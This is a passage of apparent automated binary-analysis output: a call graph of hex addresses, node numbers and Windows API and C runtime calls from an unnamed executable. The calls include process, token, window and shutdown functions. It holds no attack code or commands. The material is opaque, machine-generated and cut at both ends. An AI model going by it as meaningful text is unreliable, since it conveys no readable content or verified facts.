calls 94682->94717 94688 110d0199 94687->94688 94689 110d019d 94688->94689 94690 110d01b4 94688->94690 94718 11029450 265 API calls 2 library calls 94689->94718 94692 110d01b1 94690->94692 94693 110d01e8 94690->94693 94692->94690 94719 11029450 265 API calls 2 library calls 94692->94719 94695 110d01e5 94693->94695 94696 110d0206 94693->94696 94695->94693 94720 11029450 265 API calls 2 library calls 94695->94720 94699 110d1090 94696->94699 94700 110d109e 94699->94700 94701 110d10b9 94700->94701 94702 110d10a2 94700->94702 94704 110d10b6 94701->94704 94706 110d10ec 94701->94706 94721 11029450 265 API calls 2 library calls 94702->94721 94704->94701 94722 11029450 265 API calls 2 library calls 94704->94722 94705 110d1160 94705->94681 94705->94682 94706->94705 94706->94706 94723 110d09e0 94706->94723 94712 110d111f _memmove 94712->94705 94713 110d1149 94712->94713 94735 11029450 265 API calls 2 library calls 94713->94735 94724 110d09ed 94723->94724 94725 110d0a08 94724->94725 94726 110d09f1 94724->94726 94728 110d0a05 94725->94728 94729 110d0a26 94725->94729 94741 11029450 265 API calls 2 library calls 94726->94741 94728->94725 94742 11029450 265 API calls 2 library calls 94728->94742 94736 110d0450 94729->94736 94734 110d0920 268 API calls 2 library calls 94734->94712 94737 110d045b 94736->94737 94738 110d0472 94736->94738 94743 11029450 265 API calls 2 library calls 94737->94743 94738->94712 94738->94734 94745 110d072f 94744->94745 94746 11163d09 _strlen 94744->94746 94745->94584 94747 11162b51 _malloc 66 API calls 94746->94747 94748 11163d1c 94747->94748 94748->94745 94765 1116be9f 94748->94765 94753 110cfe7d 94752->94753 94754 110cfe98 94753->94754 94755 110cfe81 94753->94755 94757 110cfe95 94754->94757 94758 110cfeb6 94754->94758 94786 11029450 265 API calls 2 library calls 94755->94786 94757->94754 94787 11029450 265 API calls 2 library calls 94757->94787 94760 110cfeb3 94758->94760 94763 110cfed9 94758->94763 94760->94758 94788 11029450 265 API calls 2 library 
calls 94760->94788 94763->94588 94763->94589 94766 1116beb4 94765->94766 94767 1116bead 94765->94767 94777 111692ef 66 API calls __getptd_noexit 94766->94777 94767->94766 94771 1116bed2 94767->94771 94769 1116beb9 94778 1116df04 11 API calls __gmtime64_s 94769->94778 94772 11163d2e 94771->94772 94779 111692ef 66 API calls __getptd_noexit 94771->94779 94772->94745 94774 1116deb2 94772->94774 94780 1116dd89 94774->94780 94777->94769 94778->94772 94779->94769 94781 1116dda8 _memset __call_reportfault 94780->94781 94782 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 94781->94782 94783 1116de94 __call_reportfault 94782->94783 94784 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94783->94784 94785 1116deb0 GetCurrentProcess TerminateProcess 94784->94785 94785->94745 94790 11162b51 _malloc 66 API calls 94789->94790 94791 1110f4ae 94790->94791 94792 1110f4b7 94791->94792 94793 1110f4ce _memset 94791->94793 94799 11029450 265 API calls 2 library calls 94792->94799 94793->94633 94796->94633 94797->94619 94798->94626 94802 110d05d9 94801->94802 94803 110d05ec 94801->94803 94802->94803 94804 110d0450 265 API calls 94802->94804 94803->94659 94803->94660 94804->94803 94807 11162bf0 HeapFree 94806->94807 94808 11162c19 __dosmaperr 94806->94808 94807->94808 94809 11162c05 94807->94809 94808->94664 94812 111692ef 66 API calls __getptd_noexit 94809->94812 94811 11162c0b GetLastError 94811->94808 94812->94811 94814 1109e9c6 94813->94814 94815 1109e930 GetTokenInformation 94813->94815 94817 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94814->94817 94816 1109e952 _strupr_s_l_stat 94815->94816 94816->94814 94819 1109e958 GetTokenInformation 94816->94819 94818 1109e9d8 94817->94818 94818->94276 94819->94814 94820 1109e96a 94819->94820 94821 1109e99f EqualSid 94820->94821 94822 1109e973 AllocateAndInitializeSid 94820->94822 94821->94814 94823 1109e9ad 94821->94823 94822->94814 94822->94821 
94824 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94823->94824 94825 1109e9c2 94824->94825 94825->94276 94827 1114302a 94826->94827 94827->94293 94829 11162dd1 94828->94829 94847 1116364b 94829->94847 94832 11163a2d 94833 11163a4d 94832->94833 94834 11163a3b 94832->94834 94982 111639dc 79 API calls 2 library calls 94833->94982 94834->94301 94836 11163a57 94836->94301 94838 11081c6d 94837->94838 94839 11081c72 94837->94839 94983 11081990 IsDBCSLeadByte 94838->94983 94841 11081c7b 94839->94841 94846 11081c93 94839->94846 94984 11163784 85 API calls 2 library calls 94841->94984 94843 11081c8c 94843->94292 94844 11081c99 94844->94292 94845 11165797 85 API calls std::_Mutex::_Mutex 94845->94846 94846->94844 94846->94845 94848 11163664 94847->94848 94851 11163420 94848->94851 94863 11163399 94851->94863 94853 11163444 94871 111692ef 66 API calls __getptd_noexit 94853->94871 94856 11163449 94872 1116df04 11 API calls __gmtime64_s 94856->94872 94858 1114519e 94858->94832 94860 1116347a 94861 111634c1 94860->94861 94873 11170c05 79 API calls 3 library calls 94860->94873 94861->94858 94874 111692ef 66 API calls __getptd_noexit 94861->94874 94864 111633ac 94863->94864 94868 111633f9 94863->94868 94875 1116b7b5 94864->94875 94867 111633d9 94867->94868 94895 11170744 68 API calls 6 library calls 94867->94895 94868->94853 94868->94860 94871->94856 94872->94858 94873->94860 94874->94858 94896 1116b73c GetLastError 94875->94896 94877 1116b7bd 94878 111633b1 94877->94878 94910 1116d7aa 66 API calls 3 library calls 94877->94910 94878->94867 94880 111704a8 94878->94880 94881 111704b4 __fsopen 94880->94881 94882 1116b7b5 __getptd 66 API calls 94881->94882 94883 111704b9 94882->94883 94884 111704e7 94883->94884 94886 111704cb 94883->94886 94933 1117373c 94884->94933 94888 1116b7b5 __getptd 66 API calls 94886->94888 94887 111704ee 94940 1117045b 74 API calls 3 library calls 94887->94940 94892 111704d0 94888->94892 94890 11170502 94941 11170515 
LeaveCriticalSection _doexit 94890->94941 94894 111704de __fsopen 94892->94894 94932 1116d7aa 66 API calls 3 library calls 94892->94932 94894->94867 94895->94868 94911 1116b5fa TlsGetValue 94896->94911 94899 1116b7a9 SetLastError 94899->94877 94902 1116b76f DecodePointer 94903 1116b784 94902->94903 94904 1116b7a0 94903->94904 94905 1116b788 94903->94905 94907 11162be5 _free 62 API calls 94904->94907 94920 1116b688 66 API calls 4 library calls 94905->94920 94909 1116b7a6 94907->94909 94908 1116b790 GetCurrentThreadId 94908->94899 94909->94899 94912 1116b60f DecodePointer TlsSetValue 94911->94912 94913 1116b62a 94911->94913 94912->94913 94913->94899 94914 11169dbe 94913->94914 94917 11169dc7 94914->94917 94916 11169e04 94916->94899 94916->94902 94917->94916 94918 11169de5 Sleep 94917->94918 94921 11170166 94917->94921 94919 11169dfa 94918->94919 94919->94916 94919->94917 94920->94908 94922 11170172 94921->94922 94927 1117018d 94921->94927 94923 1117017e 94922->94923 94922->94927 94930 111692ef 66 API calls __getptd_noexit 94923->94930 94924 111701a0 RtlAllocateHeap 94926 111701c7 94924->94926 94924->94927 94926->94917 94927->94924 94927->94926 94931 1116d4a8 DecodePointer 94927->94931 94928 11170183 94928->94917 94930->94928 94931->94927 94934 11173764 EnterCriticalSection 94933->94934 94935 11173751 94933->94935 94934->94887 94942 1117367a 94935->94942 94937 11173757 94937->94934 94969 1116d7aa 66 API calls 3 library calls 94937->94969 94940->94890 94941->94892 94943 11173686 __fsopen 94942->94943 94944 11173696 94943->94944 94945 111736ae 94943->94945 94970 1116d99d 66 API calls 2 library calls 94944->94970 94953 111736bc __fsopen 94945->94953 94973 11169d79 94945->94973 94948 1117369b 94971 1116d7ee 66 API calls 7 library calls 94948->94971 94951 111736ce 94979 111692ef 66 API calls __getptd_noexit 94951->94979 94952 111736dd 94956 1117373c __lock 65 API calls 94952->94956 94953->94937 94954 111736a2 94972 1116d52d GetModuleHandleW GetProcAddress ExitProcess 
___crtCorExitProcess 94954->94972 94958 111736e4 94956->94958 94960 11173717 94958->94960 94961 111736ec InitializeCriticalSectionAndSpinCount 94958->94961 94962 11162be5 _free 65 API calls 94960->94962 94963 11173708 94961->94963 94964 111736fc 94961->94964 94962->94963 94981 11173733 LeaveCriticalSection _doexit 94963->94981 94965 11162be5 _free 65 API calls 94964->94965 94967 11173702 94965->94967 94980 111692ef 66 API calls __getptd_noexit 94967->94980 94970->94948 94971->94954 94975 11169d82 94973->94975 94974 11162b51 _malloc 65 API calls 94974->94975 94975->94974 94976 11169db8 94975->94976 94977 11169d99 Sleep 94975->94977 94976->94951 94976->94952 94978 11169dae 94977->94978 94978->94975 94978->94976 94979->94953 94980->94963 94981->94953 94982->94836 94983->94839 94984->94843 94985->94318 94986 11115b70 95004 11145320 94986->95004 94989 11115bb5 94990 11115b98 94989->94990 94991 11115bc4 CoInitialize CoCreateInstance 94989->94991 94992 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94990->94992 94994 11115bf4 LoadLibraryA 94991->94994 94997 11115be9 94991->94997 94995 11115ba6 94992->94995 94993 111450a0 std::_Mutex::_Mutex 90 API calls 94993->94989 94996 11115c10 GetProcAddress 94994->94996 94994->94997 95000 11115c20 SHGetSettings 94996->95000 95001 11115c34 FreeLibrary 94996->95001 94998 11115cd1 CoUninitialize 94997->94998 94999 11115cd7 94997->94999 94998->94999 95002 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 94999->95002 95000->95001 95001->94997 95003 11115ce6 95002->95003 95005 111450a0 std::_Mutex::_Mutex 90 API calls 95004->95005 95006 11115b8e 95005->95006 95006->94989 95006->94990 95006->94993 95007 11173a35 95008 1116b7b5 __getptd 66 API calls 95007->95008 95009 11173a52 _LcidFromHexString 95008->95009 95010 11173a5f GetLocaleInfoA 95009->95010 95011 11173a86 95010->95011 95012 11173a92 95010->95012 95014 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 
5 API calls 95011->95014 95030 111646ce 85 API calls 2 library calls 95012->95030 95016 11173c02 95014->95016 95015 11173a9e 95017 11173aa8 GetLocaleInfoA 95015->95017 95027 11173ad8 _LangCountryEnumProc@4 _strlen 95015->95027 95017->95011 95018 11173ac7 95017->95018 95031 111646ce 85 API calls 2 library calls 95018->95031 95019 11173b4b GetLocaleInfoA 95019->95011 95021 11173b6e 95019->95021 95033 111646ce 85 API calls 2 library calls 95021->95033 95023 11173ad2 95023->95027 95032 11163784 85 API calls 2 library calls 95023->95032 95025 11173b79 95025->95011 95028 11173b81 _strlen 95025->95028 95034 111646ce 85 API calls 2 library calls 95025->95034 95027->95011 95027->95019 95028->95011 95035 111739da GetLocaleInfoW _GetPrimaryLen _strlen 95028->95035 95030->95015 95031->95023 95032->95027 95033->95025 95034->95028 95035->95011 95036 1102e640 95037 1102e683 95036->95037 95038 1110f420 std::_Mutex::_Mutex 265 API calls 95037->95038 95039 1102e68a 95038->95039 95041 1102e6aa 95039->95041 96107 11142a60 95039->96107 95435 11142bb0 95041->95435 95043 1102e6d4 95044 1102e701 95043->95044 96115 11081bb0 95043->96115 95047 11142bb0 86 API calls 95044->95047 95046 1102e6e6 95048 11081bb0 86 API calls 95046->95048 95049 1102e72a 95047->95049 95048->95044 95050 11162de7 std::_Mutex::_Mutex 79 API calls 95049->95050 95054 1102e737 95049->95054 95050->95054 95051 1102e766 95052 1102e7e5 CreateEventA 95051->95052 95053 1102e7bf GetSystemMetrics 95051->95053 95059 1102e805 95052->95059 95060 1102e819 95052->95060 95053->95052 95055 1102e7ce 95053->95055 95054->95051 95057 111450a0 std::_Mutex::_Mutex 90 API calls 95054->95057 95058 11146450 std::_Mutex::_Mutex 21 API calls 95055->95058 95057->95051 95061 1102e7d8 95058->95061 96269 11029450 265 API calls 2 library calls 95059->96269 95064 1110f420 std::_Mutex::_Mutex 265 API calls 95060->95064 96125 1102d330 95061->96125 95065 1102e820 95064->95065 95066 1102e840 95065->95066 95067 111100d0 425 API calls 95065->95067 95068 
1110f420 std::_Mutex::_Mutex 265 API calls 95066->95068 95067->95066 95069 1102e854 95068->95069 95070 111100d0 425 API calls 95069->95070 95071 1102e874 95069->95071 95070->95071 95072 1110f420 std::_Mutex::_Mutex 265 API calls 95071->95072 95073 1102e8f3 95072->95073 95074 1102e923 95073->95074 96270 11060f70 301 API calls std::_Mutex::_Mutex 95073->96270 95076 1110f420 std::_Mutex::_Mutex 265 API calls 95074->95076 95077 1102e93d 95076->95077 95078 1102e962 FindWindowA 95077->95078 96271 11060be0 293 API calls std::_Mutex::_Mutex 95077->96271 95081 1102eab7 95078->95081 95082 1102e99b 95078->95082 95442 110613d0 95081->95442 95082->95081 95086 1102e9b3 GetWindowThreadProcessId 95082->95086 95085 110613d0 268 API calls 95087 1102ead5 95085->95087 95088 11146450 std::_Mutex::_Mutex 21 API calls 95086->95088 95089 110613d0 268 API calls 95087->95089 95090 1102e9d9 OpenProcess 95088->95090 95091 1102eae1 95089->95091 95090->95081 95092 1102e9f9 95090->95092 95094 1102eaf8 95091->95094 95095 1102eaef 95091->95095 96272 11094b30 105 API calls 95092->96272 95449 11145910 95094->95449 96273 11027d60 119 API calls 2 library calls 95095->96273 95096 1102ea18 95098 11146450 std::_Mutex::_Mutex 21 API calls 95096->95098 95101 1102ea2c 95098->95101 95099 1102eaf4 95099->95094 95103 1102ea6b CloseHandle FindWindowA 95101->95103 95104 11146450 std::_Mutex::_Mutex 21 API calls 95101->95104 95102 1102eb07 95464 11144dc0 ExpandEnvironmentStringsA 95102->95464 95105 1102ea93 GetWindowThreadProcessId 95103->95105 95106 1102eaa7 95103->95106 95109 1102ea3e SendMessageA WaitForSingleObject 95104->95109 95105->95106 95110 11146450 std::_Mutex::_Mutex 21 API calls 95106->95110 95109->95103 95112 1102ea5e 95109->95112 95113 1102eab4 95110->95113 95115 11146450 std::_Mutex::_Mutex 21 API calls 95112->95115 95113->95081 95114 1102eb2a 95116 1102ec01 95114->95116 95488 11062d60 95114->95488 95117 1102ea68 95115->95117 95503 110274c0 95116->95503 95117->95103 96334 11142ac0 95435->96334 
95437 11142bf3 95437->95043 95438 11165797 85 API calls std::_Mutex::_Mutex 95440 11142bc5 95438->95440 95439 11142ac0 IsDBCSLeadByte 95439->95440 95440->95437 95440->95438 95440->95439 95441 11142bfc 95440->95441 95441->95043 95443 11061446 95442->95443 95444 110613f7 95442->95444 95445 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95443->95445 95444->95443 95448 11081bb0 86 API calls 95444->95448 96346 110612f0 268 API calls 4 library calls 95444->96346 95447 1102eac9 95445->95447 95447->95085 95448->95444 96347 11144bd0 95449->96347 95452 11144bd0 std::_Mutex::_Mutex 265 API calls 95453 11145947 wsprintfA 95452->95453 95454 11143230 std::_Mutex::_Mutex 8 API calls 95453->95454 95456 11145964 95454->95456 95455 11145990 95458 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95455->95458 95456->95455 95457 11143230 std::_Mutex::_Mutex 8 API calls 95456->95457 95459 11145979 95457->95459 95460 1114599c 95458->95460 95459->95455 95461 11145980 95459->95461 95460->95102 95462 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95461->95462 95463 1114598c 95462->95463 95463->95102 95465 11144df7 95464->95465 95466 11144e14 std::_Mutex::_Mutex 95465->95466 95467 11144e2e 95465->95467 95475 11144e04 95465->95475 95470 11144e25 GetModuleFileNameA 95466->95470 95468 11144bd0 std::_Mutex::_Mutex 265 API calls 95467->95468 95471 11144e34 95468->95471 95469 11142290 std::_Mutex::_Mutex 265 API calls 95472 11144e88 95469->95472 95470->95471 95473 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 95471->95473 95474 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95472->95474 95473->95475 95476 1102eb18 95474->95476 95475->95469 95477 11143230 95476->95477 95478 11143251 CreateFileA 95477->95478 95480 111432ee CloseHandle 95478->95480 95481 111432ce 95478->95481 95484 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95480->95484 
95482 111432d2 CreateFileA 95481->95482 95483 1114330b 95481->95483 95482->95480 95482->95483 95486 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 95483->95486 95485 11143307 95484->95485 95485->95114 95487 1114331a 95486->95487 95487->95114 95489 1105dd10 79 API calls 95488->95489 95490 11062d88 95489->95490 96396 11061c90 95490->96396 97164 11060f40 95503->97164 96108 11142aa8 96107->96108 96111 11142a6e 96107->96111 96109 11142290 std::_Mutex::_Mutex 265 API calls 96108->96109 96110 11142ab0 96109->96110 96110->95041 96111->96108 96112 11142a92 96111->96112 99083 11142310 267 API calls std::_Mutex::_Mutex 96112->99083 96114 11142a98 96114->95041 96116 11081bbd 96115->96116 96117 11081bc2 96115->96117 99084 11081990 IsDBCSLeadByte 96116->99084 96119 11081bcb 96117->96119 96122 11081bdf 96117->96122 99085 111646ce 85 API calls 2 library calls 96119->99085 96121 11081bd8 96121->95046 96123 11081c43 96122->96123 96124 11165797 85 API calls std::_Mutex::_Mutex 96122->96124 96123->95046 96124->96122 96126 11146450 std::_Mutex::_Mutex 21 API calls 96125->96126 96127 1102d36c 96126->96127 96128 11145320 std::_Mutex::_Mutex 90 API calls 96127->96128 96129 1102d374 96128->96129 96130 1102d3a9 GetCurrentProcess SetPriorityClass 96129->96130 96131 1102d37d InterlockedIncrement 96129->96131 96134 1102d3dd 96130->96134 96131->96130 96132 1102d38c 96131->96132 96133 11146450 std::_Mutex::_Mutex 21 API calls 96132->96133 96135 1102d396 96133->96135 96136 1102d3e6 SetEvent 96134->96136 96140 1102d3ed 96134->96140 96137 1102d3a0 Sleep 96135->96137 96136->96140 96137->96137 96138 1102d424 96139 1102d452 96138->96139 99105 1109f1d0 273 API calls std::_Mutex::_Mutex 96138->99105 99106 11028e70 584 API calls std::_Mutex::_Mutex 96139->99106 96140->96138 99103 11029370 279 API calls 2 library calls 96140->99103 96144 1102d40d 99104 110ff6c0 278 API calls 2 library calls 96144->99104 96146 1102d463 99086 11028090 SetEvent 96146->99086 96148 1102d468 
96149 1102d472 96148->96149 96150 1102d47d 96148->96150 99107 110ec980 998 API calls 96149->99107 96152 1102d49a 96150->96152 96153 1102d49f 96150->96153 99108 110594a0 SetEvent 96152->99108 96155 1102d4a7 96153->96155 96156 1102d4de 96153->96156 96155->96156 96163 1102d4d3 Sleep 96155->96163 96157 11146450 std::_Mutex::_Mutex 21 API calls 96156->96157 96158 1102d4e8 96157->96158 96159 1102d4f5 96158->96159 96160 1102d526 96158->96160 96159->96158 96161 1105dd10 79 API calls 96159->96161 96162 1102d523 96160->96162 96165 1102d58a 96160->96165 96166 1102d53f 96160->96166 96164 1102d518 96161->96164 96162->96160 96162->96165 96163->96156 96164->96160 99109 1102cff0 294 API calls std::_Mutex::_Mutex 96164->99109 99112 11026f20 6 API calls std::ios_base::_Tidy 96165->99112 99087 110affa0 96166->99087 96170 1102d590 96177 1102d5af PostThreadMessageA 96170->96177 96179 1102d5cb 96170->96179 96173 1102d613 96178 1102d62d 96173->96178 96187 11146450 std::_Mutex::_Mutex 21 API calls 96173->96187 96175 1102d5f0 99115 11059400 DeleteCriticalSection CloseHandle 96175->99115 99113 1110f3a0 WaitForSingleObject 96177->99113 96182 1102d66b 96178->96182 99116 11105420 26 API calls std::_Mutex::_Mutex 96178->99116 96179->96173 96179->96175 99114 1110f3a0 WaitForSingleObject 96179->99114 96180 1102d56a 96266 1102d57d std::ios_base::_Tidy 96180->96266 99111 111352b0 299 API calls 5 library calls 96180->99111 96186 1102d681 96182->96186 96192 11075d10 947 API calls 96182->96192 96188 11146450 std::_Mutex::_Mutex 21 API calls 96186->96188 96187->96178 96193 1102d68b 96188->96193 96190 1102d661 99117 11107b50 662 API calls std::_Mutex::_Mutex 96190->99117 96192->96186 96196 1113cc30 311 API calls 96193->96196 96195 1102d889 96199 1102d8a0 96195->96199 99136 1100d200 wsprintfA 96195->99136 96200 1102d690 96196->96200 96198 1102d666 99118 11105ac0 347 API calls std::_Mutex::_Mutex 96198->99118 96206 1102d8c7 GetModuleFileNameA GetFileAttributesA 96199->96206 96219 1102d9e3 96199->96219 
96204 11146450 std::_Mutex::_Mutex 21 API calls 96200->96204 96207 1102d69a 96204->96207 96205 1102d895 96208 11146450 std::_Mutex::_Mutex 21 API calls 96205->96208 96209 1102d8ef 96206->96209 96206->96219 96216 1102d6ae std::ios_base::_Tidy 96207->96216 99119 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 96207->99119 96208->96199 96211 1110f420 std::_Mutex::_Mutex 265 API calls 96209->96211 96210 11146450 std::_Mutex::_Mutex 21 API calls 96213 1102da92 96210->96213 96215 1102d8f6 96211->96215 99139 11146410 FreeLibrary 96213->99139 96214 11146450 std::_Mutex::_Mutex 21 API calls 96218 1102d6c1 96214->96218 96221 11142a60 267 API calls 96215->96221 96232 1102d918 96215->96232 96216->96214 96224 1102d6d5 std::ios_base::_Tidy 96218->96224 99120 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 96218->99120 96219->96210 96220 1102da9a 96222 1102dad6 96220->96222 96228 1102dac4 ExitWindowsEx 96220->96228 96229 1102dab4 ExitWindowsEx Sleep 96220->96229 96221->96232 96225 1102dae6 96222->96225 96226 1102dadb Sleep 96222->96226 96227 1102d74f 96224->96227 99121 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96224->99121 96230 11146450 std::_Mutex::_Mutex 21 API calls 96225->96230 96226->96225 96237 1102d760 std::ios_base::_Tidy 96227->96237 99123 1110fc70 278 API calls 2 library calls 96227->99123 96228->96222 96229->96228 96236 11142bb0 86 API calls 96232->96236 96239 1102d93d 96236->96239 96259 1102d7d9 std::ios_base::_Tidy 96237->96259 99124 1110fc70 278 API calls 2 library calls 96237->99124 96238 11146450 std::_Mutex::_Mutex 21 API calls 96240 1102d7ec 96238->96240 96239->96219 96242 1102d809 CloseHandle 96240->96242 99125 1108a570 96240->99125 96244 1102d824 96242->96244 96245 1102d82a 96242->96245 96249 11162be5 _free 66 API calls 96244->96249 96245->96266 99132 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96245->99132 96246 11146450 
std::_Mutex::_Mutex 21 API calls 96258 1102d6ff std::ios_base::_Tidy 96246->96258 96249->96245 96250 1102d800 std::ios_base::_Tidy 96250->96242 96257 1102d858 96257->96266 99134 1110fc70 278 API calls 2 library calls 96257->99134 96258->96227 96258->96246 99122 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96258->99122 96259->96238 96260 11162be5 _free 66 API calls 96265 1102d83c 96260->96265 96265->96257 96265->96260 99133 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96265->99133 99135 1100d4e0 FreeLibrary 96266->99135 96270->95074 96271->95078 96272->95096 96273->95099 96335 11142ad6 96334->96335 96336 11142b93 96335->96336 96341 11081a70 96335->96341 96336->95440 96338 11142afb 96339 11081a70 IsDBCSLeadByte 96338->96339 96340 11142b2b _memmove 96339->96340 96340->95440 96342 11081a7c 96341->96342 96344 11081a81 std::_Mutex::_Mutex __mbschr_l 96341->96344 96345 11081990 IsDBCSLeadByte 96342->96345 96344->96338 96345->96344 96346->95444 96348 11144bf2 96347->96348 96349 11144c09 std::_Mutex::_Mutex 96347->96349 96393 11029450 265 API calls 2 library calls 96348->96393 96351 11144d97 96349->96351 96354 11144c3c GetModuleFileNameA 96349->96354 96353 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 96351->96353 96355 11144db3 wsprintfA 96353->96355 96371 11081b40 96354->96371 96355->95452 96357 11144c51 96358 11144c61 SHGetFolderPathA 96357->96358 96359 11144d48 96357->96359 96361 11144c8e 96358->96361 96362 11144cad SHGetFolderPathA 96358->96362 96360 11142290 std::_Mutex::_Mutex 262 API calls 96359->96360 96360->96351 96361->96362 96365 11144c94 96361->96365 96364 11144ce2 std::_Mutex::_Mutex 96362->96364 96367 1102a620 std::_Mutex::_Mutex 145 API calls 96364->96367 96394 11029450 265 API calls 2 library calls 96365->96394 96369 11144cf3 96367->96369 96375 11144670 96369->96375 96373 11081b53 _strrchr 96371->96373 96372 11081b6a 
std::_Mutex::_Mutex 96372->96357 96373->96372 96395 11081990 IsDBCSLeadByte 96373->96395 96376 111446fa 96375->96376 96377 1114467b 96375->96377 96376->96359 96377->96376 96377->96377 96378 1114468b GetFileAttributesA 96377->96378 96379 111446a5 96378->96379 96380 11144697 96378->96380 96381 11163cf8 __strdup 66 API calls 96379->96381 96380->96359 96382 111446ac 96381->96382 96383 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 96382->96383 96384 111446b6 96383->96384 96385 11144670 std::_Mutex::_Mutex 67 API calls 96384->96385 96391 111446d3 96384->96391 96386 111446c6 96385->96386 96387 111446dc 96386->96387 96388 111446ce 96386->96388 96390 11162be5 _free 66 API calls 96387->96390 96389 11162be5 _free 66 API calls 96388->96389 96389->96391 96392 111446e1 CreateDirectoryA 96390->96392 96391->96359 96392->96391 96395->96372 96517 11144ea0 96396->96517 96398 11061d1c 96519 11144eb3 std::ios_base::_Tidy 96517->96519 96518 11144dc0 267 API calls 96518->96519 96519->96518 96521 11144f1a std::ios_base::_Tidy 96519->96521 96522 11144ed5 GetLastError 96519->96522 96618 11163fed 96519->96618 96521->96398 96522->96519 97168 11060e40 97164->97168 97179 11060760 97168->97179 97180 1110f420 std::_Mutex::_Mutex 265 API calls 97179->97180 97181 1106077c 97180->97181 99083->96114 99084->96117 99085->96121 99086->96148 99140 110805f0 99087->99140 99092 1102d54a 99096 110eb080 99092->99096 99093 110affe7 99152 11029450 265 API calls 2 library calls 99093->99152 99097 110affa0 267 API calls 99096->99097 99098 110eb0ad 99097->99098 99168 110ea450 99098->99168 99102 1102d555 99110 110b0190 267 API calls std::_Mutex::_Mutex 99102->99110 99103->96144 99104->96138 99105->96139 99106->96146 99107->96150 99108->96153 99109->96162 99110->96180 99111->96266 99112->96170 99113->96170 99114->96179 99116->96190 99117->96198 99118->96182 99120->96224 99121->96258 99122->96258 99123->96237 99124->96259 99126 1108a617 99125->99126 99129 1108a5aa std::ios_base::_Tidy 99125->99129 99127 1108a61e 
DeleteCriticalSection 99126->99127 99181 1106e1b0 99127->99181 99128 1108a5be CloseHandle 99128->99129 99129->99126 99129->99128 99131 1108a644 std::ios_base::_Tidy 99131->96250 99132->96265 99133->96265 99134->96266 99135->96195 99136->96205 99139->96220 99141 11080614 99140->99141 99142 11080618 99141->99142 99143 1108062f 99141->99143 99153 11029450 265 API calls 2 library calls 99142->99153 99144 11080648 99143->99144 99145 1108062c 99143->99145 99149 110aff90 99144->99149 99145->99143 99154 11029450 265 API calls 2 library calls 99145->99154 99155 110812d0 99149->99155 99156 1108131d 99155->99156 99157 110812f1 99155->99157 99160 1108136a wsprintfA 99156->99160 99161 11081345 wsprintfA 99156->99161 99157->99156 99158 1108130b 99157->99158 99159 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99158->99159 99162 11081319 99159->99162 99167 11029450 265 API calls 2 library calls 99160->99167 99161->99156 99162->99092 99162->99093 99170 110ea45b 99168->99170 99169 110ea4f5 99178 110b0190 267 API calls std::_Mutex::_Mutex 99169->99178 99170->99169 99171 110ea47e 99170->99171 99173 110ea495 99170->99173 99179 11029450 265 API calls 2 library calls 99171->99179 99174 110ea492 99173->99174 99175 110ea4c2 SendMessageTimeoutA 99173->99175 99174->99173 99180 11029450 265 API calls 2 library calls 99174->99180 99175->99169 99178->99102 99184 1106e1c4 99181->99184 99182 1106e1c8 99182->99131 99184->99182 99185 1106d9a0 67 API calls 2 library calls 99184->99185 99185->99184 99200 11134d10 99201 11134d48 99200->99201 99202 11134d19 99200->99202 99203 11145320 std::_Mutex::_Mutex 90 API calls 99202->99203 99204 11134d1e 99203->99204 99204->99201 99205 11132bf0 274 API calls 99204->99205 99206 11134d27 99205->99206 99206->99201 99207 1105dd10 79 API calls 99206->99207 99207->99201 99208 110310c0 99209 110310ce 99208->99209 99210 11145e80 268 API calls 99209->99210 99211 110310df SetUnhandledExceptionFilter 99210->99211 99212 110310ef 
std::_Mutex::_Mutex 99211->99212 99213 11040860 99214 11040892 99213->99214 99215 11040898 99214->99215 99220 110408b4 99214->99220 99216 110facc0 15 API calls 99215->99216 99218 110408aa CloseHandle 99216->99218 99217 110409c8 99219 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99217->99219 99218->99220 99221 110409d5 99219->99221 99220->99217 99223 110408ed 99220->99223 99245 11087ee0 297 API calls 5 library calls 99220->99245 99222 11040948 99235 110facc0 GetTokenInformation 99222->99235 99223->99217 99223->99222 99226 1104095a 99227 11040962 CloseHandle 99226->99227 99231 11040969 99226->99231 99227->99231 99228 110409ab 99229 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99228->99229 99233 110409c4 99229->99233 99230 11040991 99232 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99230->99232 99231->99228 99231->99230 99234 110409a7 